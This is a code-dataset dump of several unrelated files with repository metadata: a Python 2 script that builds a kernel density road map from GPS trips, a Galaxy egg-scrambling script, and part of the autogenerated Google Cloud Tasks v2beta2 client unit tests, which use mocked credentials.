erukar/content/inventory/materials/raw/SalericiteCrystal.py
|
Python
|
agpl-3.0
| 236
|
[
"CRYSTAL"
] |
74ba7bec0b41e452696a7049ad685cb1053fdaa7583255de8786e204f146ec32
|
import cv
from math import atan2, sqrt, ceil, pi, fmod
import sys, getopt, os
from location import TripLoader
from pylibs import spatialfunclib
from itertools import tee, izip
import sqlite3
##
## important parameters
##
cell_size = 1 # meters
gaussian_blur = 17
trips_path = "trips/trips_1m/"
def pairwise(iterable):
"s -> (s0,s1), (s1,s2), (s2, s3), ..."
a, b = tee(iterable)
next(b, None)
return izip(a, b)
class KDE:
def __init__(self):
pass
def create_kde_with_trips(self, all_trips):
print "trips path: " + str(trips_path)
print "cell size: " + str(cell_size)
print "gaussian blur: " + str(gaussian_blur)
# flag to save images
save_images = True
sys.stdout.write("\nFinding bounding box... ")
sys.stdout.flush()
min_lat = all_trips[0].locations[0].latitude
max_lat = all_trips[0].locations[0].latitude
min_lon = all_trips[0].locations[0].longitude
max_lon = all_trips[0].locations[0].longitude
for trip in all_trips:
for location in trip.locations:
if (location.latitude < min_lat):
min_lat = location.latitude
if (location.latitude > max_lat):
max_lat = location.latitude
if (location.longitude < min_lon):
min_lon = location.longitude
if (location.longitude > max_lon):
max_lon = location.longitude
print "done."
# find bounding box for data
min_lat -= 0.003
max_lat += 0.003
min_lon -= 0.005
max_lon += 0.005
diff_lat = max_lat - min_lat
diff_lon = max_lon - min_lon
#print min_lat, min_lon, max_lat, max_lon
width = int(diff_lon * spatialfunclib.METERS_PER_DEGREE_LONGITUDE / cell_size)
height = int(diff_lat * spatialfunclib.METERS_PER_DEGREE_LATITUDE / cell_size)
yscale = height / diff_lat # pixels per lat
xscale = width / diff_lon # pixels per lon
# aggregate intensity map for all traces
themap = cv.CreateMat(height,width,cv.CV_16UC1)
cv.SetZero(themap)
##
## Build an aggregate intensity map from all the edges
##
trip_counter = 1
for trip in all_trips:
if ((trip_counter % 10 == 0) or (trip_counter == len(all_trips))):
sys.stdout.write("\rCreating histogram (trip " + str(trip_counter) + "/" + str(len(all_trips)) + ")... ")
sys.stdout.flush()
trip_counter += 1
temp = cv.CreateMat(height,width,cv.CV_8UC1)
cv.SetZero(temp)
temp16 = cv.CreateMat(height,width,cv.CV_16UC1)
cv.SetZero(temp16)
for (orig,dest) in pairwise(trip.locations):
oy = height - int(yscale * (orig.latitude - min_lat))
ox = int(xscale * (orig.longitude - min_lon))
dy = height - int(yscale * (dest.latitude - min_lat))
dx = int(xscale * (dest.longitude - min_lon))
cv.Line(temp, (ox, oy), (dx, dy), (32), 1, cv.CV_AA)
# accumulate trips into themap
cv.ConvertScale(temp,temp16,1,0)
cv.Add(themap,temp16,themap)
lines = cv.CreateMat(height,width,cv.CV_8U)
cv.SetZero(lines)
print "done."
trip_counter = 1
for trip in all_trips:
if ((trip_counter % 10 == 0) or (trip_counter == len(all_trips))):
sys.stdout.write("\rCreating drawing (trip " + str(trip_counter) + "/" + str(len(all_trips)) + ")... ")
sys.stdout.flush()
trip_counter += 1
for (orig, dest) in pairwise(trip.locations):
oy = height - int(yscale * (orig.latitude - min_lat))
ox = int(xscale * (orig.longitude - min_lon))
dy = height - int(yscale * (dest.latitude - min_lat))
dx = int(xscale * (dest.longitude - min_lon))
cv.Line(lines, (ox, oy), (dx, dy), (255), 1, cv.CV_AA)
# save the lines
cv.SaveImage("raw_data.png", lines)
print "done."
#print "Intensity map acquired."
sys.stdout.write("Smoothing... ")
sys.stdout.flush()
        # smooth the aggregated intensity map with a Gaussian kernel
cv.Smooth(themap, themap, cv.CV_GAUSSIAN, gaussian_blur, gaussian_blur)
cv.SaveImage("kde.png", themap)
print "done."
print "\nKDE generation complete."
if __name__ == '__main__':
opts,args = getopt.getopt(sys.argv[1:],"c:b:p:h")
for o,a in opts:
if o == "-c":
cell_size=int(a)
elif o == "-b":
gaussian_blur = int(a)
elif o == "-p":
trips_path = str(a)
elif o == "-h":
print "Usage: kde.py [-c <cell_size>] [-b <gaussian_blur_size>] [-p <trips_path>] [-h]\n"
sys.exit()
k = KDE()
k.create_kde_with_trips(TripLoader.load_all_trips(trips_path))
|
Vanuan/gpx_to_road_map
|
biagoni2012/kde.py
|
Python
|
apache-2.0
| 5,391
|
[
"Gaussian"
] |
8dd01698322f62506528116e0c7284e70a6c32e09b33e1ced9712c2891b120c5
|
"""
usage: dist-scramble.py <egg_name> [platform]
egg_name - The egg to scramble (as defined in eggs.ini)
platform - The platform to scramble on (as defined in
dist-eggs.ini). Leave blank for all.
Platform-inspecific eggs ignore this argument.
"""
import os, sys, logging
root = logging.getLogger()
root.setLevel( 10 )
root.addHandler( logging.StreamHandler( sys.stdout ) )
lib = os.path.abspath( os.path.join( os.path.dirname( __file__ ), "..", "lib" ) )
sys.path.append( lib )
from galaxy.eggs import DistCrate
if len( sys.argv ) > 3 or len( sys.argv ) < 2:
print __doc__
sys.exit( 1 )
elif len( sys.argv ) == 3:
c = DistCrate( sys.argv[2] )
else:
c = DistCrate()
c.parse()
egg_list = c.get( sys.argv[1] )
if egg_list is None:
print "error: %s not in eggs.ini" % sys.argv[1]
sys.exit( 1 )
failed = []
for egg in egg_list:
if not egg.scramble():
failed.append( egg.platform['galaxy'] )
if len( failed ):
print ""
print "Scramble failed to build eggs on the following platforms (more details"
print "can be found by reviewing the output above):"
print "\n".join( failed )
|
dbcls/dbcls-galaxy
|
scripts/dist-scramble.py
|
Python
|
mit
| 1,160
|
[
"Galaxy"
] |
88bc4b5c77c18dace29df039c17f41e8938728a80989776b8f6777402134d4f8
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.tasks_v2beta2.services.cloud_tasks import CloudTasksAsyncClient
from google.cloud.tasks_v2beta2.services.cloud_tasks import CloudTasksClient
from google.cloud.tasks_v2beta2.services.cloud_tasks import pagers
from google.cloud.tasks_v2beta2.services.cloud_tasks import transports
from google.cloud.tasks_v2beta2.types import cloudtasks
from google.cloud.tasks_v2beta2.types import queue
from google.cloud.tasks_v2beta2.types import queue as gct_queue
from google.cloud.tasks_v2beta2.types import target
from google.cloud.tasks_v2beta2.types import task
from google.cloud.tasks_v2beta2.types import task as gct_task
from google.iam.v1 import iam_policy_pb2 # type: ignore
from google.iam.v1 import options_pb2 # type: ignore
from google.iam.v1 import policy_pb2 # type: ignore
from google.oauth2 import service_account
from google.protobuf import any_pb2 # type: ignore
from google.protobuf import duration_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from google.rpc import status_pb2 # type: ignore
from google.type import expr_pb2 # type: ignore
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert CloudTasksClient._get_default_mtls_endpoint(None) is None
assert (
CloudTasksClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
)
assert (
CloudTasksClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
CloudTasksClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
CloudTasksClient._get_default_mtls_endpoint(sandbox_mtls_endpoint)
== sandbox_mtls_endpoint
)
assert CloudTasksClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [CloudTasksClient, CloudTasksAsyncClient,])
def test_cloud_tasks_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_info"
) as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "cloudtasks.googleapis.com:443"
@pytest.mark.parametrize(
"transport_class,transport_name",
[
(transports.CloudTasksGrpcTransport, "grpc"),
(transports.CloudTasksGrpcAsyncIOTransport, "grpc_asyncio"),
],
)
def test_cloud_tasks_client_service_account_always_use_jwt(
transport_class, transport_name
):
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [CloudTasksClient, CloudTasksAsyncClient,])
def test_cloud_tasks_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "cloudtasks.googleapis.com:443"
def test_cloud_tasks_client_get_transport_class():
transport = CloudTasksClient.get_transport_class()
available_transports = [
transports.CloudTasksGrpcTransport,
]
assert transport in available_transports
transport = CloudTasksClient.get_transport_class("grpc")
assert transport == transports.CloudTasksGrpcTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc"),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
@mock.patch.object(
CloudTasksClient, "DEFAULT_ENDPOINT", modify_default_endpoint(CloudTasksClient)
)
@mock.patch.object(
CloudTasksAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(CloudTasksAsyncClient),
)
def test_cloud_tasks_client_client_options(
client_class, transport_class, transport_name
):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(CloudTasksClient, "get_transport_class") as gtc:
transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(CloudTasksClient, "get_transport_class") as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class(transport=transport_name)
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
):
with pytest.raises(ValueError):
client = client_class(transport=transport_name)
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,use_client_cert_env",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc", "true"),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
"true",
),
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc", "false"),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
"false",
),
],
)
@mock.patch.object(
CloudTasksClient, "DEFAULT_ENDPOINT", modify_default_endpoint(CloudTasksClient)
)
@mock.patch.object(
CloudTasksAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(CloudTasksAsyncClient),
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_cloud_tasks_client_mtls_env_auto(
client_class, transport_class, transport_name, use_client_cert_env
):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=client_cert_source_callback,
):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class", [CloudTasksClient, CloudTasksAsyncClient])
@mock.patch.object(
CloudTasksClient, "DEFAULT_ENDPOINT", modify_default_endpoint(CloudTasksClient)
)
@mock.patch.object(
CloudTasksAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(CloudTasksAsyncClient),
)
def test_cloud_tasks_client_get_mtls_endpoint_and_cert_source(client_class):
mock_client_cert_source = mock.Mock()
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "true".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source == mock_client_cert_source
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "false".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "false"}):
mock_client_cert_source = mock.Mock()
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert doesn't exist.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert exists.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=mock_client_cert_source,
):
(
api_endpoint,
cert_source,
) = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source == mock_client_cert_source
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc"),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
def test_cloud_tasks_client_client_options_scopes(
client_class, transport_class, transport_name
):
# Check the case scopes are provided.
options = client_options.ClientOptions(scopes=["1", "2"],)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,grpc_helpers",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc", grpc_helpers),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
grpc_helpers_async,
),
],
)
def test_cloud_tasks_client_client_options_credentials_file(
client_class, transport_class, transport_name, grpc_helpers
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
def test_cloud_tasks_client_client_options_from_dict():
with mock.patch(
"google.cloud.tasks_v2beta2.services.cloud_tasks.transports.CloudTasksGrpcTransport.__init__"
) as grpc_transport:
grpc_transport.return_value = None
client = CloudTasksClient(client_options={"api_endpoint": "squid.clam.whelk"})
grpc_transport.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,grpc_helpers",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc", grpc_helpers),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
grpc_helpers_async,
),
],
)
def test_cloud_tasks_client_create_channel_credentials_file(
client_class, transport_class, transport_name, grpc_helpers
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# test that the credentials from file are saved and used as the credentials.
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch.object(
google.auth, "default", autospec=True
) as adc, mock.patch.object(
grpc_helpers, "create_channel"
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
file_creds = ga_credentials.AnonymousCredentials()
load_creds.return_value = (file_creds, None)
adc.return_value = (creds, None)
client = client_class(client_options=options, transport=transport_name)
create_channel.assert_called_with(
"cloudtasks.googleapis.com:443",
credentials=file_creds,
credentials_file=None,
quota_project_id=None,
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
scopes=None,
default_host="cloudtasks.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize("request_type", [cloudtasks.ListQueuesRequest, dict,])
def test_list_queues(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListQueuesResponse(
next_page_token="next_page_token_value",
)
response = client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListQueuesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListQueuesPager)
assert response.next_page_token == "next_page_token_value"
def test_list_queues_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
client.list_queues()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListQueuesRequest()
@pytest.mark.asyncio
async def test_list_queues_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.ListQueuesRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListQueuesResponse(next_page_token="next_page_token_value",)
)
response = await client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListQueuesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListQueuesAsyncPager)
assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_queues_async_from_dict():
await test_list_queues_async(request_type=dict)
def test_list_queues_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListQueuesRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
call.return_value = cloudtasks.ListQueuesResponse()
client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_queues_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListQueuesRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListQueuesResponse()
)
await client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_list_queues_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListQueuesResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_queues(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_queues_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_queues(
cloudtasks.ListQueuesRequest(), parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_queues_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            cloudtasks.ListQueuesResponse()
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_queues(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_queues_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_queues(
cloudtasks.ListQueuesRequest(), parent="parent_value",
)
def test_list_queues_pager(transport_name: str = "grpc"):
client = CloudTasksClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
